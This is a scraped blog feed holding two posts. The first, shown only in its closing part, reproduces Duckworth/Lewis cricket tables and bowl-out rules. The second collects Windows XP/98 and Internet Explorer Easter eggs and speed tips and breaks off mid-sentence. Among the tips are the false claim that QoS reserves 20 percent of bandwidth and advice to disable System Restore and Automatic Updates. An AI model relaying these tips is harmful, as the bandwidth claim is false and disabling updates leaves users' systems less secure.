</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">further 18 runs from 3 overs. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">The D/L (Duckworth/Lewis) method of adjusting target scores in interrupted one-day</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">cricket matches – Standard Edition </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">45</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">*Use only when Professional Edition is not available.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Table of resource percentages remaining – over by over </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Overs left 50 to 0</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">The D/L (Duckworth/Lewis) method of adjusting target scores in interrupted one-day</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">cricket matches - Standard Edition </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"> </span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Page 46</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">46</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">*Use only when Professional Edition is not available. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Table of resource percentages remaining – ball-by-ball </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Overs left 50 to 40</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">The D/L (Duckworth/Lewis) method of adjusting target scores in interrupted one-day</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">cricket matches - Standard Edition </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">*Use only when Professional Edition is not available. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"> </span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Page 47</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">47</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Table of resource percentages remaining - ball-by-ball </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Overs left 40 to 30</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">The D/L (Duckworth/Lewis) method of adjusting target scores in interrupted one-day</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">cricket matches - Standard Edition </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">*Use only when Professional Edition is not available. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Table of resource percentages remaining - ball-by-ball </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"> </span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Page 48</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">48</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Overs left 30 to 20</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">The D/L (Duckworth/Lewis) method of adjusting target scores in interrupted one-day</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">cricket matches - Standard Edition </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">*Use only when Professional Edition is not available. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Table of resource percentages remaining - ball-by-ball </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Overs left 20 to 10</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"> </span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Page 49</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">49</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">The D/L (Duckworth/Lewis) method of adjusting target scores in interrupted one-day</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">cricket matches - Standard Edition </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">*Use only when Professional Edition is not available. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Table of resource percentages remaining - ball-by-ball </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Overs left 10 to 0 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"> </span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Page 50</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">50</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"> </span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Page 51</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">51</span></span></span></span><br /><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">APPENDIX G</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">WCL Div 1 2007 - Procedure for the Bowl Out in the Final</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">The following procedure will apply should the provision for a bowl out be adopted in</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">any match. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">1. Subject to weather conditions the bowl out will take place on the scheduled day of</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">the match at a time to be determined by the tournament referee. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">2. The bowl out will take place on the pitch allocated for the match (the designated </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">pitch) unless otherwise determined by the umpires in consultation with the ground </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">authority and the tournament referee. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">3. A full set of stumps, including bails, will be pitched at both ends of the designated </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">pitch. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">4. The bowlers will all bowl from the same end. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">5. The tournament referee shall decide which end the bowlers will bowl from.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">6. ICC shall ensure there is an adequate supply of dry, used balls. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">7. The captains shall toss a coin for the right to decide which team bowls first or </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">second in the bowl out. The tournament referee will supervise the toss in the </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">normal manner. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">8. The captains shall nominate their five bowlers to each other, the umpires and </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">referee prior to the toss. In the event of injury during the bowl out, the injured </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">player may be replaced by another bowler. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">9. The wicket keeper will not be permitted to stand up to the stumps. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">10. No bowler will be allowed a practice delivery. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">11. The umpires will stand in their normal positions and will be responsible for </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">officially recording the number of ‘hits’ on the wicket. Their decision shall be</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">final as to the result. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">12. The referee will be responsible for making sure only the chosen bowlers actually</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">bowl, and that no bowler bowls more than once until permitted to do so. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">13. The bowls are taken alternately by the teams. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">14. The team with the most number of hits after five bowls shall be declared the </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">winner. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"> </span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Page 52</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">52</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">15. If, after both teams have taken five bowls, both have scored the same number of </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">hits on the wicket, or have not scored any hits, bowls continue to be taken in the</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">same order until one team has scored a hit more than the other from the same</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">number of bowls. That team shall be declared the winner. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">16. Each bowl is taken by a different player and all 10 eligible players (the wicket </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">keeper shall not bowl) must bowl a delivery before any player can take a second </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">bowl. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">17. Only the eligible players and match officials are permitted to remain on the field </span><span style="font-family:arial;">of play when the bowls are being taken. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">18. All players, except the bowler at the time and the wicket keeper, must remain just </span><span style="font-family:arial;">outside the 30 yard circle at mid-wicket. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">19. Unless otherwise stated by the referee and on-field umpires, Law 24 and ICC </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">standard playing condition 24.1 shall apply. In the case of an infringement the </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">umpire shall call ‘no ball’ and the delivery shall be considered a miss and will not </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">be retaken.</span></span></span></span><br /><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Autometic Calculator:</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;"><a href="http://www.duckworth-lewis.com/Calculator/tabid/72/Default.aspx">http://www.duckworth-lewis.com/Calculator/tabid/72/Default.aspx</a></span></span></span></span><br /><br />This information in this blog is copied from official website: <span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;"><a href="http://www.duckworth-lewis.com/Calculator/tabid/72/Default.aspx">www.duckworth-lewis.com</a></span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Mainak Bhattacharya</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">EE, 2nd Year, GNIT</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;"><a href="http://makdee.co.cc/">http://makdee.co.cc</a></span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">cthmeifucan@makdee.co.cc</span></span></span></span><br /><br /><br /><!--sizeo:4--></div>Mak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0tag:blogger.com,1999:blog-3836310671942777887.post-12457051459356683282008-03-17T04:05:00.006+05:302008-03-18T07:34:15.540+05:30Easter Egg's<p><span style=";font-family:Verdana;font-size:85%;" ><b><span style="color: rgb(255, 0, 0);font-family:verdana;font-size:130%;" >For Windows XP:</span><br /><br /></b></span></p><p><span style=";font-family:Verdana;font-size:85%;" ><b>"0" Blank File, and Clock AVI File</b><br />For Windows XP, If you look in your "My Computer\C:\WINDOWS\" In this folder, after all other folders, you find a text file named "0". If you open it, nothing will be in there, hence the filename "0". Another thing would be a file called "Clock". It's an AVI file. It can open it in Windows Media Player. It's a very simple and plain animation.<br /><br />These 2 files, were probably left in by the Microsoft Programmers as Easter-Eggs for anyone that could find them.</span></p> <p><span style=";font-family:Verdana;font-size:85%;" ><b>Con Folder</b><br />1. In any windows or dos try to make a folder named 'con'.<br />2. You will be presented by an error that it already exists, or other error preventing you creating this directory. </span> </p> <span style=";font-family:Verdana;font-size:85%;" ><b>"Quotes" in windows XP</b><br />Ok, there is a secret file in Windows XP called "quotes". In order to get there you must be somewhat familiar with how to use Windows, simply open up My Computer (explorer) and double click on your main drive (probably C:) next navigate to: C:\WINDOWS\SYSTEM32\DRIVERS\etc This is where the quotes file is. Open the file named quotes in your favorite text editor (notepad, MS Word) then look at the quotes put there by the MS developers!<br /><br /><b>Easier way to force win in Solitaire </b><br />Here is how to make you instantly win a game of solitaire. Simply press Alt + Shift + 2.<br /><br /><br /></span><p><b><span style="font-size:100%;">The Steps: One Click Shutdown Button Shortcut:</span></b></p> <p align="left"><strong>1. </strong>Shutdown shortcut: The first step to a your one click shutdown shortcut button, is to right-click on your desktop, now choose New, then choose Shortcut. The Windows Shortcut Wizard will appear. In the box that appears, in the "location of shortcut area" type in <span style="color: rgb(255, 0, 0);">shutdown -s <span style="color: rgb(0, 0, 0);">to shutdown. For the name leave it shutdown or type in a new name like SHUTDOWN or OFF.</span></span></p> <p align="left"><span style="color: rgb(0, 0, 0);">2. Reboot shortcut: The first step to your one click reboot shortcut button, is to right-click on your desktop, now choose New, then choose Shortcut. The Windows Shortcut Wizard will appear. In the box that appears, in the "location of shortcut" area type in <span style="color: rgb(255, 0, 0);">shutdown -r</span> to reboot. For the name type in Reboot or Restart.</span></p> <p align="center"><span style="color: rgb(0, 0, 0);">3. After you have create your shortcuts on your desktop, just double-click on one to shut down or reboot your computer. Now it time to customize your new shortcuts. One Click Shutdown Button Shortcut.</span><br /></p> <p align="left"><span style="color: rgb(0, 0, 0);">4. Switches you can use with shutdown shortcuts. There are some switches you can use to customize your shutdown shortcuts. To use the switches type in, <span style="color: rgb(255, 0, 0);">shutdown -s</span> will shut down PC, <span style="color: rgb(255, 0, 0);">shutdown -r </span></span>will reboot PC,<span style="color: rgb(0, 0, 0);"><span style="color: rgb(255, 0, 0);"> shutdown -f<span style="color: rgb(0, 0, 0);"> will forces any running applications to shot down, <span style="color: rgb(255, 0, 0);">shutdown -l </span></span></span></span>will log off the current user, <span style="color: rgb(255, 0, 0);">shutdown -t nn</span> will indicates the duration of delay, in seconds, before performing the action, and<span style="color: rgb(0, 0, 0);"><span style="color: rgb(255, 0, 0);"><span style="color: rgb(0, 0, 0);"><span style="color: rgb(255, 0, 0);"><span style="color: rgb(0, 0, 0);"> <span style="color: rgb(255, 0, 0);">shutdown -c "message" </span></span></span></span></span></span>will display a message in the System Shutdown windows, max 127 characters and must be enclosed in quotation marts.</p> <p align="left">5. I use these two technique to create one shutdown & one reboot shortcuts on my desktop, one for turning off my computer, and one for rebooting. These are the ones I use:</p> <blockquote> <div class="spBody" align="left"><span style="color: rgb(255, 0, 0);">shutdown -s -t 04 -c</span> "later Geek!" - This one will shut down the PC.<br /> <span style="color: rgb(255, 0, 0);">shutdown -r -t 04 -c</span> "Rebooting Now!" - This one will reboot the PC.</div> </blockquote> <p align="left">6. Just a little more customizing. Now your need to change the icons to a better looking icons. Right click on your new shutdown shortcut and pick properties on the menu. Then click on change icon, now pick a new icon for your shortcuts. I picketed the red icon for the shutdown shortcut and a green icon for the reboot shortcut. The shutdown shortcuts are automatically put on your desktop, but to make it more convent I put them both on my toolbar. You can move them by dragging and dropping them on to your quick launch toolbar, it up to you. </p> <p align="center"><a href="http://www.webtechgeek.com/"><img src="http://www.webtechgeek.com/NewYorkPics/shutdownBar.gif" border="0" height="49" width="386" /></a></p> <p align="left">Now you have two new one click shutdown and reboot shortcut buttons on your desktop and or toolbar. One Click Shutdown Button Shortcut. Easy yes! Remember to come back to WebTechGeek.com for more how to's!</p><br /><p align="left"><br /></p><p align="left"><span style="color: rgb(255, 0, 0); font-weight: bold;font-family:verdana;font-size:130%;" >For Windows 9x:</span></p><br /><p><span style=";font-family:Verdana;font-size:85%;" ><b>Windows 98 Team<br /></b>1. In the Windows directory go to "Application Data\Microsoft\WELCOME"<br />2. Create a Shortcut for the file Weldata.exe by right clicking on the file and selecting "Create Shortcut"<br />3. Right click on the newly created shortcut and select "Properties"<br />4. In the shortcut tab, add the following at the end of the "Target" edit box " You_are_a_real_rascal". This causes the application WELDATA.EXE to be called with the argument 'You_are_a_real_rascal'<br />5. Now in the "Run" combobox select "Minimized"<br />6. Click OK and double click the shortcut & ENJOY!</span></p><p><span style=";font-family:Verdana;font-size:85%;" ><b>Volcano!</b><br />Right click on the desktop and click on Properties. On the Screensaver tab, select the 3D Text screensaver and open its properties. In the text box, type "volcano".</span></p> <p><span style=";font-family:Verdana;font-size:85%;" ><b>Registration Wizard hidden credits</b><br />1. Click Start, Run, and type WELCOME.EXE to load the Welcome to Windows program.<br />2. Click REGISTER NOW.<br />3. When the first screen of the WINDOWS 98 REGISTRATION WIZARD comes up, hold down CTRL-SHIFT and right click on the image to the left.<br />4. Voila.. hidden credits from the program's creators. </span></p> <p><span style=";font-family:Verdana;font-size:85%;" ><b>Reference to Wassily Kandinsky in Setup</b><br />In the actual Windows 98 setup files, there is a file called "DOSSETUP.BIN". If you look at the contents of this file with Notepad, Wordpad, DOS's EDIT, or any other text editor, you will find the following phrase near the end of the file:<br /><br />Wassily Kandinsky was the great Russian painter who participated in the Expressionist movement in Germany, taught at the Bauhaus, and edited the Blue Rider Almanac. </span></p> <p><span style=";font-family:Verdana;font-size:85%;" ><b>Hearts Card Look</b><br />1. Press Start Button and then press "Run".<br />2. Type "regedit".<br />3. Goto: HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Applets\Hearts<br />4. Insert a new String called "ZB".<br />5. Then Type "42" as String.<br />6. Start Hearts<br />7. Press CTRL+ALT+SHIFT+F12 to see the Cards of the others. </span></p> <p><span style=";font-family:Verdana;font-size:85%;" ><b>Eject your PC!</b><br />1.Press Start.<br />2.Then Programs.<br />3.Then Applications.<br />4.Right click on calculator, then properties.<br />5.Click change icon. Double click the normal calculator icon.<br />6.Press Ok.<br />7.Press Start.<br />8.Wait a couple of seconds. </span></p> <p><span style=";font-family:Verdana;font-size:85%;" ><b>Windows 98 Team 2</b><br />1. Double click on the clock to bring up the date & time properties<br />2. Click on the 'Time Zone' tab<br />3. Hold down the Ctrl Key, ( here's the hard part,) Click and hold the mouse button down on Cairo Egypt.<br />4. With the mouse button still down, drag the pointer to Baton Rouge, LA.<br />5. Release the mouse button, but continue holding control.<br />6. Click the mouse button, and drag from Baton Rouge to Redmond, WA, release the button, and if it was done right, the same movie as was played in the 'Windows 98 Team' will play. Just a different way to get to it. </span></p> <span style="font-weight: bold; color: rgb(255, 0, 0);font-size:130%;" ><br />For IE5.5 or before:<br /><br /></span><p><span style=";font-family:Verdana;font-size:85%;" ><b>See your self!</b><br />Open IE 5.5 Click on Help > About. Hold down Ctrl + Shift + Alt and click on acknowledgements. </span></p> <p><span style=";font-family:Verdana;font-size:85%;" ><b>Star Trek Space map!</b><br />Open up IE and click Tools > Internet Options > General > Languages. Click on the Add Button. Type "ie-ee" (no quotes) and click OK. More "User Defined [ie-ee]" to the top of the list. Exit back to where you can browse in IE again. Click on Search toolbar button and click Customize. Also, select Previous Searches. in search assistant, click on Fine Yourself. in the box that says "Please specify where you would like to be found" type in anything to g to to a star trek space map!</span></p><p><span style=";font-family:Verdana;font-size:85%;" ><br /></span></p><p><span style="color: rgb(255, 0, 0);font-size:130%;" ><span style="font-weight: bold;">Run Your Computer in optimal Speed:</span></span></p><p><span style="color: rgb(255, 0, 0);font-size:130%;" ><span style="font-weight: bold;"></span></span><br /></p><p><span style=";font-family:Verdana;font-size:85%;" ><b>1. Speedup the Start menu</b><br />The Start menu takes quite a while to display the list of programs installed. In order to get Windows XP to display the list faster, you will have to edit the registry settings. But before you set about doing this, remember to back up your registry before making any changes. To speed up your Start menu, go to Start > Run and type regedit. This will open the registry window. Then navigate to the following key: HKEY_CURRENT_USER<br />\Control Panel\Desktop folder. Thereafter, scroll down in the right panel and double-click on the menu ‘Show Delay File’. In the Value Data box, change the default value for the menu speed from 400 to a lesser number, such as 1 or even 0. Click OK. You should now find a significant increase in the Start menu speed.<br /><br /><br /><b>2. Modifying visual settings</b><br />If you have only 128 MB RAM, your machine might be a bit sluggish after installing Windows XP. So to achieve optimal performance without buying additional RAM, disable certain visual settings and free up some precious memory. Go to the Control Panel, click on the Advanced tab in System, and choose Settings under the Performance option. Change various graphical effects. Uncheck the animation and shadow options as they tend to consume a lot of memory. You should get a better response from your OS now without spending any money on RAM.<br /><br /><b>3. Grouping/ungrouping taskbar items</b><br />Try opening more than three windows of any program, for instance Internet Explorer, and you will see them automatically grouped together under a single button. This happens because Windows XP, by default, enables the option for grouping similar programs on the taskbar. To uncheck this option, right-click on a blank area of the Taskbar and select Properties. Under Properties, deselect ‘Group Similar Taskbar Buttons’, and then click OK.<br />If you want to specify the number of windows before Window XP groups the program windows, you will have to navigate to the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Explorer\Advanced\Taskbar Groupsize. Now right-click on Taskbar Groupsize and change the hexadecimal value to whatever you like (for example, 4 or 5 or even 10). XP will now group the programs according to the number you set.<br /><br /><b>4. Disabling Automatic Windows Update and System Restore </b><br />There are certain services such as Windows Update and System Restore, which are automatically loaded and occupy a lot of space. If you would like to disable them, right-click on My Computer and choose Properties. Click on the System Restore tab and check the box ‘Turn off System Restore’. This will increase Windows performance and save disk space.<br />Similarly, locate the ‘Automatic Update’ option just next to ‘System Restore’. This option will periodically ask you to update the OS. You can go ahead and disable this, but remember that you will have to update Windows manually after applying this option since there will be no reminders.<br /><br /><br /><b>5. Creating personal screensavers </b><br />You can use your photographs for creating slide show presentations or even creating a screensaver. Right-click an empty spot on your desktop, choose Properties, and click the Screensaver tab. In the Screensaver list, click on ‘My Pictures Slideshow’, and click ‘Settings’ to make any adjustments such as how often the pictures should change, their size and whether you would like to use transition effects between pictures. Click OK to finish. The screensaver that will now be generated will display photographs from the My Pictures<br />folder in a random manner.<br /><br /><br /><b>6. Increasing connection speed</b><br />Some of us may find that after installing Windows XP, the Internet connection gets slower. A possible reason for this is the QoS (Quality of Service) installed. This service reserves 20 per cent of the bandwidth for itself, even with QoS disabled. In order to remove this reserved quota, you will have to make sure you are logged on as Administrator. Go to Start > Run and type gpedit.msc. Expand the ‘local computer policy’ branch, the ‘administrative templates’ branch, and the ‘network’ branch. Highlight the ‘QoS Packet Scheduler’ in the left window and in the right window double-click the ‘limit reservable bandwidth’ setting. Then, on the Setting tab, check the ‘enabled’ item and change the ‘Bandwidth limit %’ to read 0. After doing this, you should immediately notice a boost in your Internet connection speed.<br /><br /><br /><b>7. Bridging connections </b><br />If you’d like to connect two or more computers via LAN, then you should utilize the Network Bridge option provided in Windows XP. There is no configuration required and you do not need to purchase additional hardware such as routers or bridges. IP addressing, address allocation, and name resolution is highly simplified in a single subnet IP network. To use this feature you<br />will have to open Network Connections. Under LAN or High-Speed Internet, select each of the private network connections that you want to be part of the bridge. Right-click one of the highlighted private network connections and click Bridge Connections.<br /><br /><br /><b>8. Removing MSN Messenger </b><br />How do you remove MSN Messenger in Windows XP? Not from the Add/Remove program list but by locating SYSOC.INF in the \Windows\INF folder (hidden file and folder). Open it in Notepad and locate the line: msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7<br />Remove the word ‘hide’ from the line and save the file. After making the necessary changes, you’ll be able to see MSN Messenger in the Add/Remove Windows components list. You can then remove it for good.<br /><br /><b>9. Renaming multiple batch files</b><br />In Windows XP, you can easily rename multiple files at a single go and save a lot of time. Click Start and click My Pictures or the folder where you have saved the pictures. Switch the view from the default Filmstrip to Thumbnails by clicking the Views button on the toolbar. Select all the pictures you want to rename by highlighting the last picture you want, then press and hold down the [Shift] key until you include all the pictures that have to be renamed, ending with the first picture in the list. Right-click the first picture, and then click Rename. Rename the first picture, and then click in the white space next to one of the pictures. The pictures are renamed all at once!<br /><br /><b>10. Creating boot-up disk </b><br />In order to create a bootable floppy disk in XP, insert a floppy and go to the floppy icon in My Computer. There you will have to right-click the floppy drive icon and click 